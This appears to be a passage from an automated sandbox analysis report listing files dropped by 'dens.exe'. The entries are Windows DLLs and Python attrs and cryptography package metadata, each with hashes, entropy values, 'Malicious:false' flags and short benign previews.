                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):5.202163846121633
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:2pUEpnWlC0i5CBWqhWXLeWEXCVWQ4iW+/x6RMySX01k9z3Aza8Az629:2ptnWm5CBWqhWtWMR9zqaH629
                                                                                                                                                                                                                                            MD5:5107487B726BDCC7B9F7E4C2FF7F907C
                                                                                                                                                                                                                                            SHA1:EBC46221D3C81A409FAB9815C4215AD5DA62449C
                                                                                                                                                                                                                                            SHA-256:94A86E28E829276974E01F8A15787FDE6ED699C8B9DC26F16A51765C86C3EADE
                                                                                                                                                                                                                                            SHA-512:A0009B80AD6A928580F2B476C1BDF4352B0611BB3A180418F2A42CFA7A03B9F0575ED75EC855D30B26E0CCA96A6DA8AFFB54862B6B9AFF33710D2F3129283FAA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.866983142029453
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:0vh8Y17aFBRsWqhW9AWEXCVWQ4mWCB4Lrp0KBQfX01k9z3ALkg5Z7:SL5WqhW9boRxB+R9z2kM7
                                                                                                                                                                                                                                            MD5:D5D77669BD8D382EC474BE0608AFD03F
                                                                                                                                                                                                                                            SHA1:1558F5A0F5FACC79D3957FF1E72A608766E11A64
                                                                                                                                                                                                                                            SHA-256:8DD9218998B4C4C9E8D8B0F8B9611D49419B3C80DAA2F437CBF15BCFD4C0B3B8
                                                                                                                                                                                                                                            SHA-512:8DEFA71772105FD9128A669F6FF19B6FE47745A0305BEB9A8CADB672ED087077F7538CD56E39329F7DAA37797A96469EAE7CD5E4CCA57C9A183B35BDC44182F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.828044267819929
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:dUnWqhWRWJWadJCsVWQ4mW+2PyttuX01k9z3A23y:cWqhWQCsHSR9zf3y
                                                                                                                                                                                                                                            MD5:650435E39D38160ABC3973514D6C6640
                                                                                                                                                                                                                                            SHA1:9A5591C29E4D91EAA0F12AD603AF05BB49708A2D
                                                                                                                                                                                                                                            SHA-256:551A34C400522957063A2D71FA5ABA1CD78CC4F61F0ACE1CD42CC72118C500C0
                                                                                                                                                                                                                                            SHA-512:7B4A8F86D583562956593D27B7ECB695CB24AB7192A94361F994FADBA7A488375217755E7ED5071DE1D0960F60F255AA305E9DD477C38B7BB70AC545082C9D5E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):30328
                                                                                                                                                                                                                                            Entropy (8bit):5.14173409150951
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:r7yaFM4Oe59Ckb1hgmLVWqhW2CsWNbZR9zQoekS:/FMq59Bb1jnoFT9zGp
                                                                                                                                                                                                                                            MD5:B8F0210C47847FC6EC9FBE2A1AD4DEBB
                                                                                                                                                                                                                                            SHA1:E99D833AE730BE1FEDC826BF1569C26F30DA0D17
                                                                                                                                                                                                                                            SHA-256:1C4A70A73096B64B536BE8132ED402BCFB182C01B8A451BFF452EFE36DDF76E7
                                                                                                                                                                                                                                            SHA-512:992D790E18AC7AE33958F53D458D15BFF522A3C11A6BD7EE2F784AC16399DE8B9F0A7EE896D9F2C96D1E2C8829B2F35FF11FC5D8D1B14C77E22D859A1387797C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):4.883012715268179
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:5eXrqjd7ZWqhW3WEXCVWQ4mW3Ql1Lrp0KBQfX01k9z3ALkjY/12:54rgWqhWsP1RxB+R9z2kjY/Y
                                                                                                                                                                                                                                            MD5:272C0F80FD132E434CDCDD4E184BB1D8
                                                                                                                                                                                                                                            SHA1:5BC8B7260E690B4D4039FE27B48B2CECEC39652F
                                                                                                                                                                                                                                            SHA-256:BD943767F3E0568E19FB52522217C22B6627B66A3B71CD38DD6653B50662F39D
                                                                                                                                                                                                                                            SHA-512:94892A934A92EF1630FBFEA956D1FE3A3BFE687DEC31092828960968CB321C4AB3AF3CAF191D4E28C8CA6B8927FBC1EC5D17D5C8A962C848F4373602EC982CD4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26208
                                                                                                                                                                                                                                            Entropy (8bit):5.023753175006074
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:4mGqX8mPrpJhhf4AN5/KiFWqhWyzWEXCVWQ4OW4034hHssDX01k9z3AaYX2cWo:4ysyr77WqhWyI0oFDR9z9YH9
                                                                                                                                                                                                                                            MD5:20C0AFA78836B3F0B692C22F12BDA70A
                                                                                                                                                                                                                                            SHA1:60BB74615A71BD6B489C500E6E69722F357D283E
                                                                                                                                                                                                                                            SHA-256:962D725D089F140482EE9A8FF57F440A513387DD03FDC06B3A28562C8090C0BC
                                                                                                                                                                                                                                            SHA-512:65F0E60136AB358661E5156B8ECD135182C8AAEFD3EC320ABDF9CFC8AEAB7B68581890E0BBC56BAD858B83D47B7A0143FA791195101DC3E2D78956F591641D16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26232
                                                                                                                                                                                                                                            Entropy (8bit):5.289041983400337
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:UuV2OlkuWYFxEpahfWqhWNWJWadJCsVWQ4mWeX9UfKUSIX01k9z3AEXzGd5S:dV2oFVhfWqhWMCstE2IR9z5Sd5S
                                                                                                                                                                                                                                            MD5:96498DC4C2C879055A7AFF2A1CC2451E
                                                                                                                                                                                                                                            SHA1:FECBC0F854B1ADF49EF07BEACAD3CEC9358B4FB2
                                                                                                                                                                                                                                            SHA-256:273817A137EE049CBD8E51DC0BB1C7987DF7E3BF4968940EE35376F87EF2EF8D
                                                                                                                                                                                                                                            SHA-512:4E0B2EF0EFE81A8289A447EB48898992692FEEE4739CEB9D87F5598E449E0059B4E6F4EB19794B9DCDCE78C05C8871264797C14E4754FD73280F37EC3EA3C304
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26232
                                                                                                                                                                                                                                            Entropy (8bit):5.284932479906984
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:tCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWqhWbQCsMSR9zful:tCV5yguNvZ5VQgx3SbwA71IkFGqHe9zI
                                                                                                                                                                                                                                            MD5:115E8275EB570B02E72C0C8A156970B3
                                                                                                                                                                                                                                            SHA1:C305868A014D8D7BBEF9ABBB1C49A70E8511D5A6
                                                                                                                                                                                                                                            SHA-256:415025DCE5A086DBFFC4CF322E8EAD55CB45F6D946801F6F5193DF044DB2F004
                                                                                                                                                                                                                                            SHA-512:B97EF7C5203A0105386E4949445350D8FF1C83BDEAEE71CCF8DC22F7F6D4F113CB0A9BE136717895C36EE8455778549F629BF8D8364109185C0BF28F3CB2B2CA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22120
                                                                                                                                                                                                                                            Entropy (8bit):5.253102285412285
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:mt3hwDGWqhWrWEXCVWQ4mWn+deyttuX01k9z3A23x:AWqhWgPSR9zfh
                                                                                                                                                                                                                                            MD5:001E60F6BBF255A60A5EA542E6339706
                                                                                                                                                                                                                                            SHA1:F9172EC37921432D5031758D0C644FE78CDB25FA
                                                                                                                                                                                                                                            SHA-256:82FBA9BC21F77309A649EDC8E6FC1900F37E3FFCB45CD61E65E23840C505B945
                                                                                                                                                                                                                                            SHA-512:B1A6DC5A34968FBDC8147D8403ADF8B800A06771CC9F15613F5CE874C29259A156BAB875AAE4CAAEC2117817CE79682A268AA6E037546AECA664CD4EEA60ADBF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22136
                                                                                                                                                                                                                                            Entropy (8bit):4.810971823417463
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:p/fHQduDWqhWJWJWadJCsVWQ4mWxrnyttuX01k9z3A2Yv6WT:p/ftWqhWoCsmySR9zfYvvT
                                                                                                                                                                                                                                            MD5:A0776B3A28F7246B4A24FF1B2867BDBF
                                                                                                                                                                                                                                            SHA1:383C9A6AFDA7C1E855E25055AAD00E92F9D6AAFF
                                                                                                                                                                                                                                            SHA-256:2E554D9BF872A64D2CD0F0EB9D5A06DEA78548BC0C7A6F76E0A0C8C069F3C0A9
                                                                                                                                                                                                                                            SHA-512:7C9F0F8E53B363EF5B2E56EEC95E7B78EC50E9308F34974A287784A1C69C9106F49EA2D9CA037F0A7B3C57620FCBB1C7C372F207C68167DF85797AFFC3D7F3BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (411)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11524
                                                                                                                                                                                                                                            Entropy (8bit):5.211520136058075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:ERsUfi6bkQk+k/kKkegToJWicnJsPVA1oz2dv7COmoKTACoEJdQ/0G6lWg+JdQV5:ERsXpLs3VoJWRnJsPvz2dDCHoKsLgA6z
                                                                                                                                                                                                                                            MD5:49CABCB5F8DA14C72C8C3D00ADB3C115
                                                                                                                                                                                                                                            SHA1:F575BECF993ECDF9C6E43190C1CB74D3556CF912
                                                                                                                                                                                                                                            SHA-256:DC9824E25AFD635480A8073038B3CDFE6A56D3073A54E1A6FB21EDD4BB0F207C
                                                                                                                                                                                                                                            SHA-512:923DAEEE0861611D230DF263577B3C382AE26400CA5F1830EE309BD6737EED2AD934010D61CDD4796618BEDB3436CD772D9429A5BED0A106EF7DE60E114E505C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: attrs.Version: 24.2.0.Summary: Classes Without Boilerplate.Project-URL: Documentation, https://www.attrs.org/.Project-URL: Changelog, https://www.attrs.org/en/stable/changelog.html.Project-URL: GitHub, https://github.com/python-attrs/attrs.Project-URL: Funding, https://github.com/sponsors/hynek.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi.Author-email: Hynek Schlawack <hs@ox.cx>.License-Expression: MIT.License-File: LICENSE.Keywords: attribute,boilerplate,class.Classifier: Development Status :: 5 - Production/Stable.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Languag
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3556
                                                                                                                                                                                                                                            Entropy (8bit):5.809424313364516
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Q9ewBtnJT/oPynEddwBbCobXm9qGmR5VXzskcGD+qLtxO:2ewnXJCKXGeR/XzKiO
                                                                                                                                                                                                                                            MD5:4B6973D2285295CF5E3A45E64EB7A455
                                                                                                                                                                                                                                            SHA1:1089F2F3C35303D6D5DD19F0C0F707B9609EE3F2
                                                                                                                                                                                                                                            SHA-256:2B368DFC37283970C33CC8D4EEC129F668EB99EBF9D3AA27F49A1B149658F2B0
                                                                                                                                                                                                                                            SHA-512:A5150ECB625A3CFDC3F22C60EB7B16FDBED01CD47505BD520491B477AE24E8C59FFAE2334948122E656F6F0A5F2AF0635B6D976241745583A3D7AF9E3781718D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:attr/__init__.py,sha256=l8Ewh5KZE7CCY0i1iDfSCnFiUTIkBVoqsXjX9EZnIVA,2087..attr/__init__.pyi,sha256=aTVHBPX6krCGvbQvOl_UKqEzmi2HFsaIVm2WKmAiqVs,11434..attr/__pycache__/__init__.cpython-312.pyc,,..attr/__pycache__/_cmp.cpython-312.pyc,,..attr/__pycache__/_compat.cpython-312.pyc,,..attr/__pycache__/_config.cpython-312.pyc,,..attr/__pycache__/_funcs.cpython-312.pyc,,..attr/__pycache__/_make.cpython-312.pyc,,..attr/__pycache__/_next_gen.cpython-312.pyc,,..attr/__pycache__/_version_info.cpython-312.pyc,,..attr/__pycache__/converters.cpython-312.pyc,,..attr/__pycache__/exceptions.cpython-312.pyc,,..attr/__pycache__/filters.cpython-312.pyc,,..attr/__pycache__/setters.cpython-312.pyc,,..attr/__pycache__/validators.cpython-312.pyc,,..attr/_cmp.py,sha256=3umHiBtgsEYtvNP_8XrQwTCdFoZIX4DEur76N-2a3X8,4123..attr/_cmp.pyi,sha256=U-_RU_UZOyPUEQzXE6RMYQQcjkZRY25wTH99sN0s7MM,368..attr/_compat.py,sha256=n2Uk3c-ywv0PkFfGlvqR7SzDXp4NOhWmNV_ZK6YfWoM,2958..attr/_config.py,sha256=z81Vt-GeT_2taxs1XZfmHx9TWlSxjP
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):87
                                                                                                                                                                                                                                            Entropy (8bit):4.730668933656452
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXAaCTQnP+tPCCfA5I:Rt2PcnWBB3
                                                                                                                                                                                                                                            MD5:52ADFA0C417902EE8F0C3D1CA2372AC3
                                                                                                                                                                                                                                            SHA1:B67635615EEF7E869D74F4813B5DC576104825DD
                                                                                                                                                                                                                                            SHA-256:D7215D7625CC9AF60AED0613AAD44DB57EBA589D0CCFC3D8122114A0E514C516
                                                                                                                                                                                                                                            SHA-512:BFA87E7B0E76E544C2108EF40B9FAC8C5FF4327AB8EDE9FEB2891BD5D38FEA117BD9EEBAF62F6C357B4DEADDAD5A5220E0B4A54078C8C2DE34CB1DD5E00F2D62
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: hatchling 1.25.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1109
                                                                                                                                                                                                                                            Entropy (8bit):5.104415762129373
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:bGf8rUrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bW8rUaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:5E55731824CF9205CFABEAB9A0600887
                                                                                                                                                                                                                                            SHA1:243E9DD038D3D68C67D42C0C4BA80622C2A56246
                                                                                                                                                                                                                                            SHA-256:882115C95DFC2AF1EEB6714F8EC6D5CBCABF667CAFF8729F42420DA63F714E9F
                                                                                                                                                                                                                                            SHA-512:21B242BF6DCBAFA16336D77A40E69685D7E64A43CC30E13E484C72A93CD4496A7276E18137DC601B6A8C3C193CB775DB89853ECC6D6EB2956DEEE36826D5EBFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:The MIT License (MIT)..Copyright (c) 2015 Hynek Schlawack and the attrs contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1332808
                                                                                                                                                                                                                                            Entropy (8bit):5.5869946203131615
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:rclJGUq/0LGn9vc+fYNXPh26UZWAzbX7jF/yquSxGh5dmlPHH8VdAt/RO2/HK2:rclJGUh69zb/FX7O5dmlPn2Ag2/HK2
                                                                                                                                                                                                                                            MD5:00CB04E37BCF1B05ED9D8FD286F395AC
                                                                                                                                                                                                                                            SHA1:B4A112962EDA09B9F975AC47F123184B745C29A3
                                                                                                                                                                                                                                            SHA-256:632FE06274F3C7AEEAC7F8C451A4D2C9751BE5F641019522BA09C6F311075EC8
                                                                                                                                                                                                                                            SHA-512:E365D66808604BA740467E46AF4BB2FDE15D24094ABD4B0C939DF185D500D148CC6E77E703FC5BB85B7574155341AAA02914963FDDE9D1001C4218575E9D1994
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5440
                                                                                                                                                                                                                                            Entropy (8bit):5.074342830021076
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DlaQIUQIhQIKQILbQIRIaMPktjaVxsxA2TtLDmplH7dwnqTIvrUmA0JQTQCQx5KN:LcPuP1srTtLDmplH7JTIvYX0JQTQ9x54
                                                                                                                                                                                                                                            MD5:554DC6138FDBF98B7F1EDFE207AF3D67
                                                                                                                                                                                                                                            SHA1:B6C806E2AFF9A0F560916A90F793348DBF0514BA
                                                                                                                                                                                                                                            SHA-256:0064A9B5FD2AC18605E512EF7127318AD9CF259E9445488C169F237A590602E1
                                                                                                                                                                                                                                            SHA-512:3A71B533874F4D0F94F15192791D2FA4DF9E8EBF184C711F1D4FA97230C04764C1C9A93258355B08107E5B72053C6901E883E3DB577E8A204D5B9EB3F8BC7BFC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: cryptography.Version: 43.0.1.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15579
                                                                                                                                                                                                                                            Entropy (8bit):5.567434003079107
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:bX1ToLbz5jF4E9VqhXJZ4WPB6s7B0Ppz+NX6in5Lqw/I+B:bXeLbhCEsJrPB6s7B0Ppz+96innVB
                                                                                                                                                                                                                                            MD5:E8478B758300439BF58613F2A3A2676C
                                                                                                                                                                                                                                            SHA1:39ED064E67212A54E4B8D1C909E6AD2ACF48025D
                                                                                                                                                                                                                                            SHA-256:5ADEAA62D3045659DDF79324823AA3BCB1CA78F264442D6F6F6B9C8A8470A634
                                                                                                                                                                                                                                            SHA-512:D7029823DC5585FBE885DDB52EED2D02D1584EB945EF23916391201FCBD17DF0B14F338BDFC6E81318297F831CA99796423206F781373857317E068F0C0B321C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:cryptography-43.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-43.0.1.dist-info/METADATA,sha256=AGSptf0qwYYF5RLvcScxitnPJZ6URUiMFp8jelkGAuE,5440..cryptography-43.0.1.dist-info/RECORD,,..cryptography-43.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-43.0.1.dist-info/WHEEL,sha256=8_4EnrLvbhzH224YH8WypoB7HFn-vpbwr_zHlr3XUBI,94..cryptography-43.0.1.dist-info/license_files/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-43.0.1.dist-info/license_files/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-43.0.1.dist-info/license_files/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=pY_pmYXjJTK-LjfCu7ot0NMj0QC2dkD1dCPyV8QjISM,445..cryptography/__init__.py,sha256=mthuUrTd4FROCpUYrTIqhjz6s6T9djAZrV7nZ1oMm2o,364..cryptography/__pycache__/__about__.cpython-312.pyc,,..cryptography/__pycache__/__ini
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):94
                                                                                                                                                                                                                                            Entropy (8bit):5.016084900984752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX5pGogP+tkKciH/KQb:RtvoTWKTQb
                                                                                                                                                                                                                                            MD5:C869D30012A100ADEB75860F3810C8C9
                                                                                                                                                                                                                                            SHA1:42FD5CFA75566E8A9525E087A2018E8666ED22CB
                                                                                                                                                                                                                                            SHA-256:F3FE049EB2EF6E1CC7DB6E181FC5B2A6807B1C59FEBE96F0AFFCC796BDD75012
                                                                                                                                                                                                                                            SHA-512:B29FEAF6587601BBE0EDAD3DF9A87BFC82BB2C13E91103699BABD7E039F05558C0AC1EF7D904BCFAF85D791B96BC26FA9E39988DD83A1CE8ECCA85029C5109F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: maturin (1.7.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                                                            Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                            MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                            SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
